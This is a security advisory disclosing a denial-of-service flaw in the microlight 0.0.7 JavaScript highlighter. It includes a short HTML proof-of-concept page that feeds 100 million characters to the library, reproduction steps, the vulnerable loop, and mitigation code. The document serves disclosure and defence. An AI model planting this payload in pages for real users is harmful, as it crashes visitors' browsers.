microlight-dos-vulnerability

Denial of Service (DoS) Vulnerability in microlight 0.0.7 (CWE-400)

CVE-2025-45526

Summary

A denial of service (DoS) vulnerability, classified as CWE-400 (Uncontrolled Resource Consumption), has been identified in the JavaScript library microlight version 0.0.7. This library, used for syntax highlighting, does not limit the size of textual content it processes in HTML elements with the microlight class. When excessively large content (e.g., 100 million characters) is processed, the reset function in microlight.js consumes excessive memory and CPU resources, causing browser crashes or unresponsiveness. An attacker can exploit this vulnerability by tricking a user into visiting a malicious web page containing a microlight element with large content, resulting in a denial of service.

Vulnerability Details

  • Vulnerability Type: Denial of Service (DoS) / CWE-400 (Uncontrolled Resource Consumption)
  • Affected Product: microlight
  • Affected Version: 0.0.7
  • CVE ID: CVE-2025-45526
  • Fixed Version: None (as of March 28, 2025)
  • Impact: Denial of service (browser crash or unresponsiveness)
  • Affected Component: microlight.js file, reset function
  • Attack Vector: Network - The attacker must trick the user into visiting a malicious web page
  • User Interaction: Required (user must load the malicious page)
  • CVSS v3.1 Score: 6.5 (Medium)
    Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Proof of Concept (PoC)

The following code demonstrates exploitation of the vulnerability. When loaded in a browser, it causes a crash due to memory exhaustion.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PoC - microlight DoS Vulnerability</title>
</head>
<body>
    <div class="microlight">
        <!-- Generates 100 million characters -->
        <script>document.write("a".repeat(100000000));</script>
    </div>
    <script src="microlight.js"></script>
</body>
</html>

Steps to Reproduce:

  1. Download microlight version 0.0.7 from the GitHub repository.
  2. Create an HTML file with the code above.
  3. Serve the file via a local server (e.g., python -m http.server 15500).
  4. Access the page via a browser (e.g., http://127.0.0.1:15500/).
  5. Observe that the browser becomes unresponsive or displays a memory error (e.g., "Not enough memory to open this page" in Chrome).

Technical Analysis

The vulnerability lies in the reset function of microlight.js, which processes textual content character by character in elements with the microlight class. Here are the key points:

  • Vulnerable Code:

    for (i = 0; el = microlighted[i++];) {
        var text = el.textContent,
            pos = 0,
            next1 = text[0],
            chr = 1,
            token = '',
            tokenType = 0;
        el.innerHTML = '';
        while (prev2 = prev1, prev1 = tokenType < 7 && prev1 == '\\' ? 1 : chr) {
            chr = next1;
            next1 = text[++pos];
            // ... (tokenization logic)
            if (token) {
                el[appendChild](node = _document.createElement('span'));
                node[appendChild](_document.createTextNode(token));
            }
            token += chr;
        }
    }
  • Impact:

    • Memory: Creation of millions of DOM nodes, leading to memory exhaustion.
    • CPU: Intensive processing for each character, making the browser unresponsive.
    • Result: Browser crash (e.g., "Render process gone" in Chrome).

Mitigation Recommendations

For the Vendor (Dmitry Prokashev)

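  1. Add a maximum size limit for textual content processed in the reset function. For example:
    // Place this check before `el.innerHTML = ''` so oversized text is left untouched.
    if (text.length > 1000000) {
        console.warn("microlight: Content too large, skipping highlighting.");
        // Skip only this element; `return` would also abandon the remaining ones.
        continue;
    }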
  2. Optimize processing by grouping characters of the same token into a single <span> before adding to the DOM.
  3. Publish a new version (e.g., 0.0.8) with these fixes.

For Users

  1. Avoid using microlight 0.0.7 in environments where untrusted content may be processed.
  2. Implement server-side validation to limit content size in microlight elements.
  3. Consider switching to alternative libraries like Prism.js or Highlight.js until a fix is available.
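
Because no fixed release exists, a site that must keep microlight 0.0.7 can apply the size limit itself on the page. The sketch below is an added example, not part of the advisory or of microlight: the function name `capMicrolightInput`, the page-wide budget and the `data-highlight-skipped` attribute are assumptions, and it assumes the guard runs before microlight's own highlighting pass.

```javascript
// Added example: page-side guard for sites that still ship microlight 0.0.7.
// Names and limits below are assumptions, not part of microlight's API.
const MAX_CHARS_PER_ELEMENT = 1000000; // same cap as the vendor suggestion above
const MAX_CHARS_PER_PAGE = 4000000;    // assumed budget across all elements

function capMicrolightInput(root, opts = {}) {
  const perElement = opts.perElement ?? MAX_CHARS_PER_ELEMENT;
  const perPage = opts.perPage ?? MAX_CHARS_PER_PAGE;
  // getElementsByClassName returns a live collection; snapshot it because
  // removing the class below would otherwise shift indices mid-loop.
  const elements = Array.from(root.getElementsByClassName('microlight'));
  const report = { kept: 0, skipped: 0, charsKept: 0 };
  for (const el of elements) {
    const length = (el.textContent || '').length;
    if (length > perElement || report.charsKept + length > perPage) {
      // Without the class, microlight never selects the element; the text
      // stays readable, just unhighlighted.
      el.classList.remove('microlight');
      el.setAttribute('data-highlight-skipped', String(length));
      report.skipped += 1;
    } else {
      report.kept += 1;
      report.charsKept += length;
    }
  }
  return report;
}

// Browser wiring (assumption: DOMContentLoaded fires before microlight's pass).
if (typeof document !== 'undefined') {
  document.addEventListener('DOMContentLoaded', () => {
    const report = capMicrolightInput(document);
    if (report.skipped) {
      console.warn('microlight guard: skipped', report.skipped, 'element(s)');
    }
  });
}
```

The guard only protects pages you control that render untrusted text inside microlight elements; it complements, rather than replaces, the server-side size limit.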

CVE Submission Information

  • Vulnerability Type: CWE-400 (Uncontrolled Resource Consumption)
  • Affected Product: microlight 0.0.7
  • Vendor: Dmitry Prokashev (asvd)
  • Impact: Denial of service
  • Attack Vector: Network, user interaction required
  • CVSS Score: 6.5 (Medium)
  • Discoverer: TORRES LUCAS (Rooting)
  • References:

Credits

This vulnerability was discovered and analyzed as part of cybersecurity research. Credits should be attributed to Rooting.

References

Additional Information

  • Discovery Date: March 28, 2025
  • Vendor Status: The vendor has not confirmed or acknowledged the vulnerability (as of March 28, 2025). The GitHub repository has not been updated since 2016.
  • Additional Recommendation: Developers using microlight should consider thorough testing for other potential vulnerabilities, especially in scenarios involving untrusted inputs.